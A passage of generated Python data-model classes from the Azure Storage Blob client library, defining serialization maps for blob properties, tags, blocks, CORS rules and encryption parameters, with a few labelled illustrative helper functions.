self.blob_items = kwargs.get('blob_items', None)
class BlobHTTPHeaders(Model):
"""Additional parameters for a set of operations.
:param blob_cache_control: Optional. Sets the blob's cache control. If
specified, this property is stored with the blob and returned with a read
request.
:type blob_cache_control: str
:param blob_content_type: Optional. Sets the blob's content type. If
specified, this property is stored with the blob and returned with a read
request.
:type blob_content_type: str
:param blob_content_md5: Optional. An MD5 hash of the blob content. Note
that this hash is not validated, as the hashes for the individual blocks
were validated when each was uploaded.
:type blob_content_md5: bytearray
:param blob_content_encoding: Optional. Sets the blob's content encoding.
If specified, this property is stored with the blob and returned with a
read request.
:type blob_content_encoding: str
:param blob_content_language: Optional. Set the blob's content language.
If specified, this property is stored with the blob and returned with a
read request.
:type blob_content_language: str
:param blob_content_disposition: Optional. Sets the blob's
Content-Disposition header.
:type blob_content_disposition: str
"""
_attribute_map = {
'blob_cache_control': {'key': '', 'type': 'str', 'xml': {'name': 'blob_cache_control'}},
'blob_content_type': {'key': '', 'type': 'str', 'xml': {'name': 'blob_content_type'}},
'blob_content_md5': {'key': '', 'type': 'bytearray', 'xml': {'name': 'blob_content_md5'}},
'blob_content_encoding': {'key': '', 'type': 'str', 'xml': {'name': 'blob_content_encoding'}},
'blob_content_language': {'key': '', 'type': 'str', 'xml': {'name': 'blob_content_language'}},
'blob_content_disposition': {'key': '', 'type': 'str', 'xml': {'name': 'blob_content_disposition'}},
}
_xml_map = {
}
def __init__(self, **kwargs):
super(BlobHTTPHeaders, self).__init__(**kwargs)
self.blob_cache_control = kwargs.get('blob_cache_control', None)
self.blob_content_type = kwargs.get('blob_content_type', None)
self.blob_content_md5 = kwargs.get('blob_content_md5', None)
self.blob_content_encoding = kwargs.get('blob_content_encoding', None)
self.blob_content_language = kwargs.get('blob_content_language', None)
self.blob_content_disposition = kwargs.get('blob_content_disposition', None)
class BlobItemInternal(Model):
"""An Azure Storage blob.
All required parameters must be populated in order to send to Azure.
:param name: Required.
:type name: str
:param deleted: Required.
:type deleted: bool
:param snapshot: Required.
:type snapshot: str
:param version_id:
:type version_id: str
:param is_current_version:
:type is_current_version: bool
:param properties: Required.
:type properties: ~azure.storage.blob.models.BlobPropertiesInternal
:param metadata:
:type metadata: ~azure.storage.blob.models.BlobMetadata
:param blob_tags:
:type blob_tags: ~azure.storage.blob.models.BlobTags
:param object_replication_metadata:
:type object_replication_metadata: dict[str, str]
"""
_validation = {
'name': {'required': True},
'deleted': {'required': True},
'snapshot': {'required': True},
'properties': {'required': True},
}
_attribute_map = {
'name': {'key': 'Name', 'type': 'str', 'xml': {'name': 'Name'}},
'deleted': {'key': 'Deleted', 'type': 'bool', 'xml': {'name': 'Deleted'}},
'snapshot': {'key': 'Snapshot', 'type': 'str', 'xml': {'name': 'Snapshot'}},
'version_id': {'key': 'VersionId', 'type': 'str', 'xml': {'name': 'VersionId'}},
'is_current_version': {'key': 'IsCurrentVersion', 'type': 'bool', 'xml': {'name': 'IsCurrentVersion'}},
'properties': {'key': 'Properties', 'type': 'BlobPropertiesInternal', 'xml': {'name': 'Properties'}},
'metadata': {'key': 'Metadata', 'type': 'BlobMetadata', 'xml': {'name': 'Metadata'}},
'blob_tags': {'key': 'BlobTags', 'type': 'BlobTags', 'xml': {'name': 'BlobTags'}},
'object_replication_metadata': {'key': 'ObjectReplicationMetadata', 'type': '{str}', 'xml': {'name': 'ObjectReplicationMetadata'}},
}
_xml_map = {
'name': 'Blob'
}
def __init__(self, **kwargs):
super(BlobItemInternal, self).__init__(**kwargs)
self.name = kwargs.get('name', None)
self.deleted = kwargs.get('deleted', None)
self.snapshot = kwargs.get('snapshot', None)
self.version_id = kwargs.get('version_id', None)
self.is_current_version = kwargs.get('is_current_version', None)
self.properties = kwargs.get('properties', None)
self.metadata = kwargs.get('metadata', None)
self.blob_tags = kwargs.get('blob_tags', None)
self.object_replication_metadata = kwargs.get('object_replication_metadata', None)
class BlobMetadata(Model):
"""BlobMetadata.
:param additional_properties: Unmatched properties from the message are
deserialized to this collection
:type additional_properties: dict[str, str]
:param encrypted:
:type encrypted: str
"""
_attribute_map = {
'additional_properties': {'key': '', 'type': '{str}', 'xml': {'name': 'additional_properties'}},
'encrypted': {'key': 'Encrypted', 'type': 'str', 'xml': {'name': 'Encrypted', 'attr': True}},
}
_xml_map = {
'name': 'Metadata'
}
def __init__(self, **kwargs):
super(BlobMetadata, self).__init__(**kwargs)
self.additional_properties = kwargs.get('additional_properties', None)
self.encrypted = kwargs.get('encrypted', None)
class BlobPrefix(Model):
"""BlobPrefix.
All required parameters must be populated in order to send to Azure.
:param name: Required.
:type name: str
"""
_validation = {
'name': {'required': True},
}
_attribute_map = {
'name': {'key': 'Name', 'type': 'str', 'xml': {'name': 'Name'}},
}
_xml_map = {
}
def __init__(self, **kwargs):
super(BlobPrefix, self).__init__(**kwargs)
self.name = kwargs.get('name', None)
class BlobPropertiesInternal(Model):
"""Properties of a blob.
All required parameters must be populated in order to send to Azure.
:param creation_time:
:type creation_time: datetime
:param last_modified: Required.
:type last_modified: datetime
:param etag: Required.
:type etag: str
:param content_length: Size in bytes
:type content_length: long
:param content_type:
:type content_type: str
:param content_encoding:
:type content_encoding: str
:param content_language:
:type content_language: str
:param content_md5:
:type content_md5: bytearray
:param content_disposition:
:type content_disposition: str
:param cache_control:
:type cache_control: str
:param blob_sequence_number:
:type blob_sequence_number: long
:param blob_type: Possible values include: 'BlockBlob', 'PageBlob',
'AppendBlob'
:type blob_type: str or ~azure.storage.blob.models.BlobType
:param lease_status: Possible values include: 'locked', 'unlocked'
:type lease_status: str or ~azure.storage.blob.models.LeaseStatusType
:param lease_state: Possible values include: 'available', 'leased',
'expired', 'breaking', 'broken'
:type lease_state: str or ~azure.storage.blob.models.LeaseStateType
:param lease_duration: Possible values include: 'infinite', 'fixed'
:type lease_duration: str or ~azure.storage.blob.models.LeaseDurationType
:param copy_id:
:type copy_id: str
:param copy_status: Possible values include: 'pending', 'success',
'aborted', 'failed'
:type copy_status: str or ~azure.storage.blob.models.CopyStatusType
:param copy_source:
:type copy_source: str
:param copy_progress:
:type copy_progress: str
:param copy_completion_time:
:type copy_completion_time: datetime
:param copy_status_description:
:type copy_status_description: str
:param server_encrypted:
:type server_encrypted: bool
:param incremental_copy:
:type incremental_copy: bool
:param destination_snapshot:
:type destination_snapshot: str
:param deleted_time:
:type deleted_time: datetime
:param remaining_retention_days:
:type remaining_retention_days: int
:param access_tier: Possible values include: 'P4', 'P6', 'P10', 'P15',
'P20', 'P30', 'P40', 'P50', 'P60', 'P70', 'P80', 'Hot', 'Cool', 'Archive'
:type access_tier: str or ~azure.storage.blob.models.AccessTier
:param access_tier_inferred:
:type access_tier_inferred: bool
:param archive_status: Possible values include:
'rehydrate-pending-to-hot', 'rehydrate-pending-to-cool'
:type archive_status: str or ~azure.storage.blob.models.ArchiveStatus
:param customer_provided_key_sha256:
:type customer_provided_key_sha256: str
:param encryption_scope: The name of the encryption scope under which the
blob is encrypted.
:type encryption_scope: str
:param access_tier_change_time:
:type access_tier_change_time: datetime
:param tag_count:
:type tag_count: int
:param expires_on:
:type expires_on: datetime
:param is_sealed:
:type is_sealed: bool
:param rehydrate_priority: Possible values include: 'High', 'Standard'
:type rehydrate_priority: str or
~azure.storage.blob.models.RehydratePriority
"""
_validation = {
'last_modified': {'required': True},
'etag': {'required': True},
}
_attribute_map = {
'creation_time': {'key': 'Creation-Time', 'type': 'rfc-1123', 'xml': {'name': 'Creation-Time'}},
'last_modified': {'key': 'Last-Modified', 'type': 'rfc-1123', 'xml': {'name': 'Last-Modified'}},
'etag': {'key': 'Etag', 'type': 'str', 'xml': {'name': 'Etag'}},
'content_length': {'key': 'Content-Length', 'type': 'long', 'xml': {'name': 'Content-Length'}},
'content_type': {'key': 'Content-Type', 'type': 'str', 'xml': {'name': 'Content-Type'}},
'content_encoding': {'key': 'Content-Encoding', 'type': 'str', 'xml': {'name': 'Content-Encoding'}},
'content_language': {'key': 'Content-Language', 'type': 'str', 'xml': {'name': 'Content-Language'}},
'content_md5': {'key': 'Content-MD5', 'type': 'bytearray', 'xml': {'name': 'Content-MD5'}},
'content_disposition': {'key': 'Content-Disposition', 'type': 'str', 'xml': {'name': 'Content-Disposition'}},
'cache_control': {'key': 'Cache-Control', 'type': 'str', 'xml': {'name': 'Cache-Control'}},
'blob_sequence_number': {'key': 'x-ms-blob-sequence-number', 'type': 'long', 'xml': {'name': 'x-ms-blob-sequence-number'}},
'blob_type': {'key': 'BlobType', 'type': 'BlobType', 'xml': {'name': 'BlobType'}},
'lease_status': {'key': 'LeaseStatus', 'type': 'LeaseStatusType', 'xml': {'name': 'LeaseStatus'}},
'lease_state': {'key': 'LeaseState', 'type': 'LeaseStateType', 'xml': {'name': 'LeaseState'}},
'lease_duration': {'key': 'LeaseDuration', 'type': 'LeaseDurationType', 'xml': {'name': 'LeaseDuration'}},
'copy_id': {'key': 'CopyId', 'type': 'str', 'xml': {'name': 'CopyId'}},
'copy_status': {'key': 'CopyStatus', 'type': 'CopyStatusType', 'xml': {'name': 'CopyStatus'}},
'copy_source': {'key': 'CopySource', 'type': 'str', 'xml': {'name': 'CopySource'}},
'copy_progress': {'key': 'CopyProgress', 'type': 'str', 'xml': {'name': 'CopyProgress'}},
'copy_completion_time': {'key': 'CopyCompletionTime', 'type': 'rfc-1123', 'xml': {'name': 'CopyCompletionTime'}},
'copy_status_description': {'key': 'CopyStatusDescription', 'type': 'str', 'xml': {'name': 'CopyStatusDescription'}},
'server_encrypted': {'key': 'ServerEncrypted', 'type': 'bool', 'xml': {'name': 'ServerEncrypted'}},
'incremental_copy': {'key': 'IncrementalCopy', 'type': 'bool', 'xml': {'name': 'IncrementalCopy'}},
'destination_snapshot': {'key': 'DestinationSnapshot', 'type': 'str', 'xml': {'name': 'DestinationSnapshot'}},
'deleted_time': {'key': 'DeletedTime', 'type': 'rfc-1123', 'xml': {'name': 'DeletedTime'}},
'remaining_retention_days': {'key': 'RemainingRetentionDays', 'type': 'int', 'xml': {'name': 'RemainingRetentionDays'}},
'access_tier': {'key': 'AccessTier', 'type': 'str', 'xml': {'name': 'AccessTier'}},
'access_tier_inferred': {'key': 'AccessTierInferred', 'type': 'bool', 'xml': {'name': 'AccessTierInferred'}},
'archive_status': {'key': 'ArchiveStatus', 'type': 'str', 'xml': {'name': 'ArchiveStatus'}},
'customer_provided_key_sha256': {'key': 'CustomerProvidedKeySha256', 'type': 'str', 'xml': {'name': 'CustomerProvidedKeySha256'}},
'encryption_scope': {'key': 'EncryptionScope', 'type': 'str', 'xml': {'name': 'EncryptionScope'}},
'access_tier_change_time': {'key': 'AccessTierChangeTime', 'type': 'rfc-1123', 'xml': {'name': 'AccessTierChangeTime'}},
'tag_count': {'key': 'TagCount', 'type': 'int', 'xml': {'name': 'TagCount'}},
'expires_on': {'key': 'Expiry-Time', 'type': 'rfc-1123', 'xml': {'name': 'Expiry-Time'}},
'is_sealed': {'key': 'Sealed', 'type': 'bool', 'xml': {'name': 'Sealed'}},
'rehydrate_priority': {'key': 'RehydratePriority', 'type': 'str', 'xml': {'name': 'RehydratePriority'}},
}
_xml_map = {
'name': 'Properties'
}
def __init__(self, **kwargs):
super(BlobPropertiesInternal, self).__init__(**kwargs)
self.creation_time = kwargs.get('creation_time', None)
self.last_modified = kwargs.get('last_modified', None)
self.etag = kwargs.get('etag', None)
self.content_length = kwargs.get('content_length', None)
self.content_type = kwargs.get('content_type', None)
self.content_encoding = kwargs.get('content_encoding', None)
self.content_language = kwargs.get('content_language', None)
self.content_md5 = kwargs.get('content_md5', None)
self.content_disposition = kwargs.get('content_disposition', None)
self.cache_control = kwargs.get('cache_control', None)
self.blob_sequence_number = kwargs.get('blob_sequence_number', None)
self.blob_type = kwargs.get('blob_type', None)
self.lease_status = kwargs.get('lease_status', None)
self.lease_state = kwargs.get('lease_state', None)
self.lease_duration = kwargs.get('lease_duration', None)
self.copy_id = kwargs.get('copy_id', None)
self.copy_status = kwargs.get('copy_status', None)
self.copy_source = kwargs.get('copy_source', None)
self.copy_progress = kwargs.get('copy_progress', None)
self.copy_completion_time = kwargs.get('copy_completion_time', None)
self.copy_status_description = kwargs.get('copy_status_description', None)
self.server_encrypted = kwargs.get('server_encrypted', None)
self.incremental_copy = kwargs.get('incremental_copy', None)
self.destination_snapshot = kwargs.get('destination_snapshot', None)
self.deleted_time = kwargs.get('deleted_time', None)
self.remaining_retention_days = kwargs.get('remaining_retention_days', None)
self.access_tier = kwargs.get('access_tier', None)
self.access_tier_inferred = kwargs.get('access_tier_inferred', None)
self.archive_status = kwargs.get('archive_status', None)
self.customer_provided_key_sha256 = kwargs.get('customer_provided_key_sha256', None)
self.encryption_scope = kwargs.get('encryption_scope', None)
self.access_tier_change_time = kwargs.get('access_tier_change_time', None)
self.tag_count = kwargs.get('tag_count', None)
self.expires_on = kwargs.get('expires_on', None)
self.is_sealed = kwargs.get('is_sealed', None)
self.rehydrate_priority = kwargs.get('rehydrate_priority', None)
class BlobTag(Model):
"""BlobTag.
All required parameters must be populated in order to send to Azure.
:param key: Required.
:type key: str
:param value: Required.
:type value: str
"""
_validation = {
'key': {'required': True},
'value': {'required': True},
}
_attribute_map = {
'key': {'key': 'Key', 'type': 'str', 'xml': {'name': 'Key'}},
'value': {'key': 'Value', 'type': 'str', 'xml': {'name': 'Value'}},
}
_xml_map = {
'name': 'Tag'
}
def __init__(self, **kwargs):
super(BlobTag, self).__init__(**kwargs)
self.key = kwargs.get('key', None)
self.value = kwargs.get('value', None)
class BlobTags(Model):
"""Blob tags.
All required parameters must be populated in order to send to Azure.
:param blob_tag_set: Required.
:type blob_tag_set: list[~azure.storage.blob.models.BlobTag]
"""
_validation = {
'blob_tag_set': {'required': True},
}
_attribute_map = {
'blob_tag_set': {'key': 'BlobTagSet', 'type': '[BlobTag]', 'xml': {'name': 'TagSet', 'itemsName': 'TagSet', 'wrapped': True}},
}
_xml_map = {
'name': 'Tags'
}
def __init__(self, **kwargs):
super(BlobTags, self).__init__(**kwargs)
self.blob_tag_set = kwargs.get('blob_tag_set', None)
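# Illustrative sketch (editorial addition): BlobTags wraps a list of BlobTag
# key/value pairs; the tag names and values below are hypothetical.
def _example_blob_tags():
    return BlobTags(blob_tag_set=[
        BlobTag(key='project', value='photos'),
        BlobTag(key='status', value='archived'),
    ])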
class Block(Model):
"""Represents a single block in a block blob. It describes the block's ID and
size.
All required parameters must be populated in order to send to Azure.
:param name: Required. The base64 encoded block ID.
:type name: str
:param size: Required. The block size in bytes.
:type size: int
"""
_validation = {
'name': {'required': True},
'size': {'required': True},
}
_attribute_map = {
'name': {'key': 'Name', 'type': 'str', 'xml': {'name': 'Name'}},
'size': {'key': 'Size', 'type': 'int', 'xml': {'name': 'Size'}},
}
_xml_map = {
}
def __init__(self, **kwargs):
super(Block, self).__init__(**kwargs)
self.name = kwargs.get('name', None)
self.size = kwargs.get('size', None)
class BlockList(Model):
"""BlockList.
:param committed_blocks:
:type committed_blocks: list[~azure.storage.blob.models.Block]
:param uncommitted_blocks:
:type uncommitted_blocks: list[~azure.storage.blob.models.Block]
"""
_attribute_map = {
'committed_blocks': {'key': 'CommittedBlocks', 'type': '[Block]', 'xml': {'name': 'CommittedBlocks', 'itemsName': 'Block', 'wrapped': True}},
'uncommitted_blocks': {'key': 'UncommittedBlocks', 'type': '[Block]', 'xml': {'name': 'UncommittedBlocks', 'itemsName': 'Block', 'wrapped': True}},
}
_xml_map = {
}
def __init__(self, **kwargs):
super(BlockList, self).__init__(**kwargs)
self.committed_blocks = kwargs.get('committed_blocks', None)
self.uncommitted_blocks = kwargs.get('uncommitted_blocks', None)
class BlockLookupList(Model):
"""BlockLookupList.
:param committed:
:type committed: list[str]
:param uncommitted:
:type uncommitted: list[str]
:param latest:
:type latest: list[str]
"""
_attribute_map = {
'committed': {'key': 'Committed', 'type': '[str]', 'xml': {'name': 'Committed', 'itemsName': 'Committed'}},
'uncommitted': {'key': 'Uncommitted', 'type': '[str]', 'xml': {'name': 'Uncommitted', 'itemsName': 'Uncommitted'}},
'latest': {'key': 'Latest', 'type': '[str]', 'xml': {'name': 'Latest', 'itemsName': 'Latest'}},
}
_xml_map = {
'name': 'BlockList'
}
def __init__(self, **kwargs):
super(BlockLookupList, self).__init__(**kwargs)
self.committed = kwargs.get('committed', None)
self.uncommitted = kwargs.get('uncommitted', None)
self.latest = kwargs.get('latest', None)
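# Illustrative sketch (editorial addition): a BlockLookupList names the block
# IDs to commit when assembling a block blob. The base64 block IDs below are
# hypothetical; 'latest' selects each ID from the uncommitted list if present,
# otherwise from the committed list.
def _example_block_lookup_list():
    return BlockLookupList(latest=['QmxvY2stMDAw', 'QmxvY2stMDAx'])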
class ClearRange(Model):
"""ClearRange.
All required parameters must be populated in order to send to Azure.
:param start: Required.
:type start: long
:param end: Required.
:type end: long
"""
_validation = {
'start': {'required': True},
'end': {'required': True},
}
_attribute_map = {
'start': {'key': 'Start', 'type': 'long', 'xml': {'name': 'Start'}},
'end': {'key': 'End', 'type': 'long', 'xml': {'name': 'End'}},
}
_xml_map = {
'name': 'ClearRange'
}
def __init__(self, **kwargs):
super(ClearRange, self).__init__(**kwargs)
self.start = kwargs.get('start', None)
self.end = kwargs.get('end', None)
class ContainerCpkScopeInfo(Model):
"""Additional parameters for create operation.
:param default_encryption_scope: Optional. Version 2019-07-07 and later.
Specifies the default encryption scope to set on the container and use for
all future writes.
:type default_encryption_scope: str
:param prevent_encryption_scope_override: Optional. Version 2019-07-07
and newer. If true, prevents any request from specifying a different
encryption scope than the scope set on the container.
:type prevent_encryption_scope_override: bool
"""
_attribute_map = {
'default_encryption_scope': {'key': '', 'type': 'str', 'xml': {'name': 'default_encryption_scope'}},
'prevent_encryption_scope_override': {'key': '', 'type': 'bool', 'xml': {'name': 'prevent_encryption_scope_override'}},
}
_xml_map = {
}
def __init__(self, **kwargs):
super(ContainerCpkScopeInfo, self).__init__(**kwargs)
self.default_encryption_scope = kwargs.get('default_encryption_scope', None)
self.prevent_encryption_scope_override = kwargs.get('prevent_encryption_scope_override', None)
class ContainerItem(Model):
"""An Azure Storage container.
All required parameters must be populated in order to send to Azure.
:param name: Required.
:type name: str
:param deleted:
:type deleted: bool
:param version:
:type version: str
:param properties: Required.
:type properties: ~azure.storage.blob.models.ContainerProperties
:param metadata:
:type metadata: dict[str, str]
"""
_validation = {
'name': {'required': True},
'properties': {'required': True},
}
_attribute_map = {
'name': {'key': 'Name', 'type': 'str', 'xml': {'name': 'Name'}},
'deleted': {'key': 'Deleted', 'type': 'bool', 'xml': {'name': 'Deleted'}},
'version': {'key': 'Version', 'type': 'str', 'xml': {'name': 'Version'}},
'properties': {'key': 'Properties', 'type': 'ContainerProperties', 'xml': {'name': 'Properties'}},
'metadata': {'key': 'Metadata', 'type': '{str}', 'xml': {'name': 'Metadata'}},
}
_xml_map = {
'name': 'Container'
}
def __init__(self, **kwargs):
super(ContainerItem, self).__init__(**kwargs)
self.name = kwargs.get('name', None)
self.deleted = kwargs.get('deleted', None)
self.version = kwargs.get('version', None)
self.properties = kwargs.get('properties', None)
self.metadata = kwargs.get('metadata', None)
class ContainerProperties(Model):
"""Properties of a container.
All required parameters must be populated in order to send to Azure.
:param last_modified: Required.
:type last_modified: datetime
:param etag: Required.
:type etag: str
:param lease_status: Possible values include: 'locked', 'unlocked'
:type lease_status: str or ~azure.storage.blob.models.LeaseStatusType
:param lease_state: Possible values include: 'available', 'leased',
'expired', 'breaking', 'broken'
:type lease_state: str or ~azure.storage.blob.models.LeaseStateType
:param lease_duration: Possible values include: 'infinite', 'fixed'
:type lease_duration: str or ~azure.storage.blob.models.LeaseDurationType
:param public_access: Possible values include: 'container', 'blob'
:type public_access: str or ~azure.storage.blob.models.PublicAccessType
:param has_immutability_policy:
:type has_immutability_policy: bool
:param has_legal_hold:
:type has_legal_hold: bool
:param default_encryption_scope:
:type default_encryption_scope: str
:param prevent_encryption_scope_override:
:type prevent_encryption_scope_override: bool
:param deleted_time:
:type deleted_time: datetime
:param remaining_retention_days:
:type remaining_retention_days: int
"""
_validation = {
'last_modified': {'required': True},
'etag': {'required': True},
}
_attribute_map = {
'last_modified': {'key': 'Last-Modified', 'type': 'rfc-1123', 'xml': {'name': 'Last-Modified'}},
'etag': {'key': 'Etag', 'type': 'str', 'xml': {'name': 'Etag'}},
'lease_status': {'key': 'LeaseStatus', 'type': 'LeaseStatusType', 'xml': {'name': 'LeaseStatus'}},
'lease_state': {'key': 'LeaseState', 'type': 'LeaseStateType', 'xml': {'name': 'LeaseState'}},
'lease_duration': {'key': 'LeaseDuration', 'type': 'LeaseDurationType', 'xml': {'name': 'LeaseDuration'}},
'public_access': {'key': 'PublicAccess', 'type': 'str', 'xml': {'name': 'PublicAccess'}},
'has_immutability_policy': {'key': 'HasImmutabilityPolicy', 'type': 'bool', 'xml': {'name': 'HasImmutabilityPolicy'}},
'has_legal_hold': {'key': 'HasLegalHold', 'type': 'bool', 'xml': {'name': 'HasLegalHold'}},
'default_encryption_scope': {'key': 'DefaultEncryptionScope', 'type': 'str', 'xml': {'name': 'DefaultEncryptionScope'}},
'prevent_encryption_scope_override': {'key': 'DenyEncryptionScopeOverride', 'type': 'bool', 'xml': {'name': 'DenyEncryptionScopeOverride'}},
'deleted_time': {'key': 'DeletedTime', 'type': 'rfc-1123', 'xml': {'name': 'DeletedTime'}},
'remaining_retention_days': {'key': 'RemainingRetentionDays', 'type': 'int', 'xml': {'name': 'RemainingRetentionDays'}},
}
_xml_map = {
}
def __init__(self, **kwargs):
super(ContainerProperties, self).__init__(**kwargs)
self.last_modified = kwargs.get('last_modified', None)
self.etag = kwargs.get('etag', None)
self.lease_status = kwargs.get('lease_status', None)
self.lease_state = kwargs.get('lease_state', None)
self.lease_duration = kwargs.get('lease_duration', None)
self.public_access = kwargs.get('public_access', None)
self.has_immutability_policy = kwargs.get('has_immutability_policy', None)
self.has_legal_hold = kwargs.get('has_legal_hold', None)
self.default_encryption_scope = kwargs.get('default_encryption_scope', None)
self.prevent_encryption_scope_override = kwargs.get('prevent_encryption_scope_override', None)
self.deleted_time = kwargs.get('deleted_time', None)
self.remaining_retention_days = kwargs.get('remaining_retention_days', None)
class CorsRule(Model):
"""CORS is an HTTP feature that enables a web application running under one
domain to access resources in another domain. Web browsers implement a
security restriction known as same-origin policy that prevents a web page
from calling APIs in a different domain; CORS provides a secure way to
allow one domain (the origin domain) to call APIs in another domain.
All required parameters must be populated in order to send to Azure.
:param allowed_origins: Required. The origin domains that are permitted to
make a request against the storage service via CORS. The origin domain is
the domain from which the request originates. Note that the origin must be
an exact case-sensitive match with the origin that the user agent sends to
the service. You can also use the wildcard character '*' to allow all
origin domains to make requests via CORS.
:type allowed_origins: str
:param allowed_methods: Required. The methods (HTTP request verbs) that
the origin domain may use for a CORS request. (comma separated)
:type allowed_methods: str
:param allowed_headers: Required. The request headers that the origin
domain may specify on the CORS request.
:type allowed_headers: str
:param exposed_headers: Required. The response headers that may be sent in
the response to the CORS request and exposed by the browser to the request
issuer.
:type exposed_headers: str
:param max_age_in_seconds: Required. The maximum amount of time that a
browser should cache the preflight OPTIONS request.
:type max_age_in_seconds: int
"""
_validation = {
'allowed_origins': {'required': True},
'allowed_methods': {'required': True},
'allowed_headers': {'required': True},
'exposed_headers': {'required': True},
'max_age_in_seconds': {'required': True, 'minimum': 0},
}
_attribute_map = {
'allowed_origins': {'key': 'AllowedOrigins', 'type': 'str', 'xml': {'name': 'AllowedOrigins'}},
'allowed_methods': {'key': 'AllowedMethods', 'type': 'str', 'xml': {'name': 'AllowedMethods'}},
'allowed_headers': {'key': 'AllowedHeaders', 'type': 'str', 'xml': {'name': 'AllowedHeaders'}},
'exposed_headers': {'key': 'ExposedHeaders', 'type': 'str', 'xml': {'name': 'ExposedHeaders'}},
'max_age_in_seconds': {'key': 'MaxAgeInSeconds', 'type': 'int', 'xml': {'name': 'MaxAgeInSeconds'}},
}
_xml_map = {
}
def __init__(self, **kwargs):
super(CorsRule, self).__init__(**kwargs)
self.allowed_origins = kwargs.get('allowed_origins', None)
self.allowed_methods = kwargs.get('allowed_methods', None)
self.allowed_headers = kwargs.get('allowed_headers', None)
self.exposed_headers = kwargs.get('exposed_headers', None)
self.max_age_in_seconds = kwargs.get('max_age_in_seconds', None)
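# Illustrative sketch (editorial addition): a CorsRule as it would be included
# in StorageServiceProperties.cors. The origins, methods and headers below are
# hypothetical; comma-separated strings are expected (the docstring above
# notes '*' as a wildcard for origins).
def _example_cors_rule():
    return CorsRule(
        allowed_origins='https://www.contoso.com',
        allowed_methods='GET,PUT',
        allowed_headers='x-ms-meta-*',
        exposed_headers='x-ms-meta-*',
        max_age_in_seconds=3600,
    )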
class CpkInfo(Model):
"""Additional parameters for a set of operations.
:param encryption_key: Optional. Specifies the encryption key to use to
encrypt the data provided in the request. If not specified, encryption is
performed with the root account encryption key. For more information, see
Encryption at Rest for Azure Storage Services.
:type encryption_key: str
:param encryption_key_sha256: The SHA-256 hash of the provided encryption
key. Must be provided if the x-ms-encryption-key header is provided.
:type encryption_key_sha256: str
:param encryption_algorithm: The algorithm used to produce the encryption
key hash. Currently, the only accepted value is "AES256". Must be provided
if the x-ms-encryption-key header is provided. Possible values include:
'AES256'
:type encryption_algorithm: str or
~azure.storage.blob.models.EncryptionAlgorithmType
"""
_attribute_map = {
'encryption_key': {'key': '', 'type': 'str', 'xml': {'name': 'encryption_key'}},
'encryption_key_sha256': {'key': '', 'type': 'str', 'xml': {'name': 'encryption_key_sha256'}},
'encryption_algorithm': {'key': '', 'type': 'EncryptionAlgorithmType', 'xml': {'name': 'encryption_algorithm'}},
}
_xml_map = {
}
def __init__(self, **kwargs):
super(CpkInfo, self).__init__(**kwargs)
self.encryption_key = kwargs.get('encryption_key', None)
self.encryption_key_sha256 = kwargs.get('encryption_key_sha256', None)
self.encryption_algorithm = kwargs.get('encryption_algorithm', None)
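# Illustrative sketch (editorial addition): the service expects the
# customer-provided key and its SHA-256 hash both base64-encoded, plus the
# algorithm name. The key bytes below are a placeholder for illustration only.
def _example_cpk_info():
    import base64
    import hashlib
    key = b'0' * 32  # hypothetical 256-bit key material
    return CpkInfo(
        encryption_key=base64.b64encode(key).decode('ascii'),
        encryption_key_sha256=base64.b64encode(hashlib.sha256(key).digest()).decode('ascii'),
        encryption_algorithm='AES256',
    )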
class CpkScopeInfo(Model):
"""Additional parameters for a set of operations.
:param encryption_scope: Optional. Version 2019-07-07 and later.
Specifies the name of the encryption scope to use to encrypt the data
provided in the request. If not specified, encryption is performed with
the default account encryption scope. For more information, see
Encryption at Rest for Azure Storage Services.
:type encryption_scope: str
"""
_attribute_map = {
'encryption_scope': {'key': '', 'type': 'str', 'xml': {'name': 'encryption_scope'}},
}
_xml_map = {
}
def __init__(self, **kwargs):
super(CpkScopeInfo, self).__init__(**kwargs)
self.encryption_scope = kwargs.get('encryption_scope', None)
class DataLakeStorageError(Model):
"""DataLakeStorageError.
:param data_lake_storage_error_details: The service error response object.
:type data_lake_storage_error_details:
~azure.storage.blob.models.DataLakeStorageErrorError
"""
_attribute_map = {
'data_lake_storage_error_details': {'key': 'error', 'type': 'DataLakeStorageErrorError', 'xml': {'name': 'error'}},
}
_xml_map = {
}
def __init__(self, **kwargs):
super(DataLakeStorageError, self).__init__(**kwargs)
self.data_lake_storage_error_details = kwargs.get('data_lake_storage_error_details', None)
class DataLakeStorageErrorException(HttpResponseError):
"""Server responsed with exception of type: 'DataLakeStorageError'.
:param deserialize: A deserializer
:param response: Server response to be deserialized.
"""
def __init__(self, response, deserialize, *args):
model_name = 'DataLakeStorageError'
self.error = deserialize(model_name, response)
if self.error is None:
self.error = deserialize.dependencies[model_name]()
super(DataLakeStorageErrorException, self).__init__(response=response)
class DataLakeStorageErrorError(Model):
"""The service error response object.
:param code: The service error code.
:type code: str
:param message: The service error message.
:type message: str
"""
_attribute_map = {
'code': {'key': 'Code', 'type': 'str', 'xml': {'name': 'Code'}},
'message': {'key': 'Message', 'type': 'str', 'xml': {'name': 'Message'}},
}
_xml_map = {
}
def __init__(self, **kwargs):
super(DataLakeStorageErrorError, self).__init__(**kwargs)
self.code = kwargs.get('code', None)
self.message = kwargs.get('message', None)
class DelimitedTextConfiguration(Model):
"""delimited text configuration.
All required parameters must be populated in order to send to Azure.
:param column_separator: Required. column separator
:type column_separator: str
:param field_quote: Required. field quote
:type field_quote: str
:param record_separator: Required. record separator
:type record_separator: str
:param escape_char: Required. escape char
:type escape_char: str
:param headers_present: Required. has headers
:type headers_present: bool
"""
_validation = {
'column_separator': {'required': True},
'field_quote': {'required': True},
'record_separator': {'required': True},
'escape_char': {'required': True},
'headers_present': {'required': True},
}
_attribute_map = {
'column_separator': {'key': 'ColumnSeparator', 'type': 'str', 'xml': {'name': 'ColumnSeparator'}},
'field_quote': {'key': 'FieldQuote', 'type': 'str', 'xml': {'name': 'FieldQuote'}},
'record_separator': {'key': 'RecordSeparator', 'type': 'str', 'xml': {'name': 'RecordSeparator'}},
'escape_char': {'key': 'EscapeChar', 'type': 'str', 'xml': {'name': 'EscapeChar'}},
'headers_present': {'key': 'HeadersPresent', 'type': 'bool', 'xml': {'name': 'HasHeaders'}},
}
_xml_map = {
'name': 'DelimitedTextConfiguration'
}
def __init__(self, **kwargs):
super(DelimitedTextConfiguration, self).__init__(**kwargs)
self.column_separator = kwargs.get('column_separator', None)
self.field_quote = kwargs.get('field_quote', None)
self.record_separator = kwargs.get('record_separator', None)
self.escape_char = kwargs.get('escape_char', None)
self.headers_present = kwargs.get('headers_present', None)
class DirectoryHttpHeaders(Model):
"""Additional parameters for a set of operations, such as: Directory_create,
Directory_rename, Blob_rename.
:param cache_control: Cache control for given resource
:type cache_control: str
:param content_type: Content type for given resource
